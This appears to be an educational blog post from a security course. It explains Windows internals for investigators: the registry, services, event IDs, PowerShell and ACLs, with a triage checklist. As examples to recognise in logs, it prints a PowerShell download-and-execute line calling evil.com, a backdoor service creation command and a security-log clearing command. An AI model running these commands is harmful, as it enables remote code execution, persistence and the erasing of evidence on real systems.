Windows Under the Hood: What Security Pros Need to Know

Linux dominates servers and security tooling, but Windows dominates the enterprise. Most corporate endpoints run Windows. Active Directory manages most corporate networks. Ransomware overwhelmingly targets Windows.

If you only know Linux, you’ll hit a wall the moment you encounter a Windows network. This post covers the Windows internals that matter for security - whether you’re attacking, defending, or investigating.

Why Windows Matters in Security

• ~75% of enterprise endpoints run Windows
• Active Directory manages authentication for most large organizations
• Ransomware primarily targets Windows environments
• Most malware is written for Windows
• Corporate breaches typically involve Windows systems at some point

You don’t need to be a Windows admin. But you need to know where things live and how to investigate them.

The File System

Windows organizes files differently from Linux.

Key Directories

Path	Purpose	Security Relevance
C:\Windows\	OS files	Malware sometimes hides here
C:\Windows\System32\	Core system binaries	LOLBins live here
C:\Windows\Temp\	System temp	Malware staging area
C:\Users\	User profiles	User data, credentials
C:\Users\[name]\AppData\	Application data	Browser data, config files, malware persistence
C:\Program Files\	64-bit applications	Installed software
C:\Program Files (x86)\	32-bit applications	Legacy software
C:\ProgramData\	App data (all users)	Shared configs, sometimes credentials

AppData: Where Things Hide

Every user has three AppData folders:

C:\Users\[name]\AppData\
├── Local\        ← Machine-specific data, browser caches
├── LocalLow\     ← Low-integrity data (sandboxed apps)
└── Roaming\      ← Follows user across machines (domain profiles)

Malware loves AppData\Local\Temp and AppData\Roaming. These directories are writable by the user and rarely monitored closely.

The Registry

The Windows Registry is a hierarchical database that stores configuration for the OS, applications, and users. It’s like a giant settings file for everything on the system.

Structure

The registry is organized into hives (top-level categories):

Hive	Abbreviation	Contains
HKEY_LOCAL_MACHINE	HKLM	System-wide settings, hardware, software
HKEY_CURRENT_USER	HKCU	Current user’s settings and preferences
HKEY_USERS	HKU	Settings for all user profiles
HKEY_CLASSES_ROOT	HKCR	File associations, COM objects
HKEY_CURRENT_CONFIG	HKCC	Current hardware profile

How to Browse It

GUI: Run regedit from the Start menu.

PowerShell:

# List contents of a registry key
Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Get a specific value
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Command Prompt:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Why the Registry Matters for Security

Persistence: Attackers write to “Run” keys so their malware starts automatically:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Any program listed here launches when Windows starts (HKLM) or when the user logs in (HKCU).

Investigation checklist - registry locations to check:

Key	What to Look For
...\CurrentVersion\Run	Auto-start programs (persistence)
...\CurrentVersion\RunOnce	One-time startup programs
HKLM\SYSTEM\CurrentControlSet\Services	Installed services
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs	Recently opened files
HKLM\SAM\SAM	Local user account database
HKLM\SYSTEM\CurrentControlSet\Control\Lsa	Authentication settings

Services

Windows services are programs that run in the background, similar to Linux daemons. They start automatically and run without a user being logged in.

Viewing Services

PowerShell:

# List all services
Get-Service

# Find running services
Get-Service | Where-Object {$_.Status -eq "Running"}

# Get details on a specific service
Get-Service -Name "wuauserv" | Format-List *

Command Prompt:

sc query
sc query wuauserv

GUI: Run services.msc.

Why Services Matter for Security

Privilege escalation: Services often run as SYSTEM (the Windows equivalent of root). If a service binary is writable or the service is misconfigured, you can replace it with malicious code that runs as SYSTEM.

Persistence: Attackers create malicious services that start automatically:

sc create backdoor binpath= "C:\temp\malware.exe" start= auto

Investigation: Unexpected services, especially those with unusual binary paths (pointing to temp directories or user folders), are suspicious.

Common Service Accounts

Account	Privilege Level	Used For
SYSTEM	Highest	Core OS services
LOCAL SERVICE	Limited	Services that don’t need network access
NETWORK SERVICE	Limited + network	Services that need network access
Custom accounts	Varies	Application-specific services

SYSTEM has more privileges than even an Administrator account. Compromising a SYSTEM-level service means full control of the machine.

Event Logs

Windows logs almost everything. Event logs are how you investigate what happened on a system.

Key Log Categories

Log	What It Records
Security	Logins, logoffs, failed logins, privilege use
System	Service starts/stops, driver issues, OS events
Application	Application errors and warnings
PowerShell/Operational	PowerShell commands executed
Sysmon/Operational	Detailed system monitoring (if Sysmon installed)

Viewing Logs

PowerShell:

# Recent security events
Get-WinEvent -LogName Security -MaxEvents 20

# Failed login attempts (Event ID 4625)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} -MaxEvents 10

# Successful logins (Event ID 4624)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} -MaxEvents 10

# PowerShell script execution
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10

GUI: Run eventvwr.msc.

Critical Event IDs

Memorize these. They come up in every Windows investigation.

Event ID	Log	Meaning
4624	Security	Successful login
4625	Security	Failed login
4648	Security	Login with explicit credentials
4672	Security	Special privileges assigned (admin login)
4688	Security	New process created
4697	Security	Service installed
4720	Security	User account created
7045	System	New service installed
1	Sysmon	Process creation (with full command line)
3	Sysmon	Network connection

Incident response workflow: Failed logins (4625) from unexpected sources → successful login (4624) → admin privileges (4672) → new service (7045) = likely compromise.

Log Clearing

Attackers often clear logs to cover their tracks:

# This is what attackers do (generates Event ID 1102)
wevtutil cl Security

Event ID 1102 in the Security log means “the audit log was cleared.” Ironically, clearing the log creates a log entry. If you see 1102, something was deleted and that itself is evidence.

PowerShell

PowerShell is Windows’ command-line shell and scripting language. It’s more powerful than Command Prompt and deeply integrated with Windows.

Essential Commands

# System information
Get-ComputerInfo | Select-Object WindowsVersion, OsArchitecture

# Current user
whoami
whoami /priv          # Show privileges
whoami /groups        # Show group memberships

# Network configuration
Get-NetIPAddress
Get-NetTCPConnection | Where-Object {$_.State -eq "Listen"}

# Running processes
Get-Process
Get-Process | Where-Object {$_.CPU -gt 10} | Sort-Object CPU -Descending

# Installed software
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |
    Select-Object DisplayName, DisplayVersion

# Scheduled tasks
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"}

# Local users
Get-LocalUser
Get-LocalGroupMember -Group "Administrators"

PowerShell in Attacks

PowerShell is heavily used by attackers because:

• It’s installed on every Windows system
• It can download and execute code from the internet
• It can interact with the Windows API directly
• It’s a trusted Microsoft binary (bypasses some security controls)

Common attack patterns:

# Download and execute (attackers use this - recognize it in logs)
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/script.ps1')

# Encoded commands (Base64 - used to avoid detection)
powershell -EncodedCommand <base64string>

Detection tip: powershell -EncodedCommand in your logs is almost always suspicious. Legitimate scripts rarely need encoding.

PowerShell Logging

Enable these to catch malicious PowerShell activity:

• Script Block Logging - Records the full content of every script executed
• Module Logging - Records pipeline execution events
• Transcription - Saves full PowerShell session transcripts to disk

Windows Permissions (ACLs)

Windows uses Access Control Lists (ACLs) instead of Linux’s rwx model. ACLs are more granular but more complex.

Checking Permissions

# Check file permissions
Get-Acl C:\Windows\System32\config\SAM | Format-List

# Check folder permissions
icacls C:\Users

icacls output:

C:\Users\Public (OI)(CI)(RX)
    BUILTIN\Administrators:(OI)(CI)(F)
    NT AUTHORITY\SYSTEM:(OI)(CI)(F)
    BUILTIN\Users:(OI)(CI)(RX)

Symbol	Meaning
F	Full control
M	Modify
RX	Read and execute
R	Read only
W	Write only
OI	Object Inherit (applies to files in folder)
CI	Container Inherit (applies to subfolders)

UAC (User Account Control)

UAC is Windows’ equivalent of sudo. Even if you’re logged in as an administrator, applications run with standard user privileges by default. UAC prompts for elevation when something needs admin access.

The UAC prompt (“Do you want to allow this app to make changes?”) is the gatekeeper.

Why it matters: UAC bypass techniques are a whole category of privilege escalation. If malware can bypass UAC, it can elevate to admin without the user seeing a prompt.

Putting It All Together: A Quick Investigation

Imagine you suspect a Windows machine is compromised. Here’s a fast triage:

# 1. Who's logged in?
query user
whoami /priv

# 2. What's running?
Get-Process | Sort-Object CPU -Descending | Select-Object -First 20 Name, Id, CPU, Path

# 3. What's listening?
Get-NetTCPConnection -State Listen | Select-Object LocalPort, OwningProcess

# 4. Any suspicious services?
Get-Service | Where-Object {$_.Status -eq "Running"} |
    Select-Object Name, DisplayName, StartType

# 5. Check auto-start programs
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# 6. Check scheduled tasks
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"} |
    Select-Object TaskName, TaskPath

# 7. Recent failed logins
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} -MaxEvents 10 2>$null

# 8. Recently created accounts
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720} -MaxEvents 5 2>$null

This gives you a quick picture: who’s on the system, what’s running, what’s exposed, and what’s suspicious.

Quick Reference

Task	Linux	Windows
Current user	whoami	whoami
User privileges	id	whoami /priv
List processes	ps aux	Get-Process
Network connections	ss -tlnp	Get-NetTCPConnection
File permissions	ls -la	icacls
Find files	find / -name "file"	Get-ChildItem -Recurse -Filter "file"
Service management	systemctl	Get-Service / sc
Log viewing	journalctl / /var/log/	Get-WinEvent / eventvwr
Run as admin	sudo	runas / UAC
Package install	apt install	winget install / MSI

What’s Next

You now have a working knowledge of both Linux and Windows from a security perspective. You know where things live, how permissions work, and where to look during an investigation.

The operating systems module is complete. Next, we move to Module 3: How Things Break - web application security, starting with how web apps work before we learn to break them.

References

• Microsoft - Windows Event Log Reference
• LOLBAS Project - Living Off the Land Binaries and Scripts
• PowerShell Documentation

---

Most corporate breaches involve Windows. If you can read event logs, check the registry, and navigate PowerShell, you can investigate 80% of incidents. That’s a skill worth having.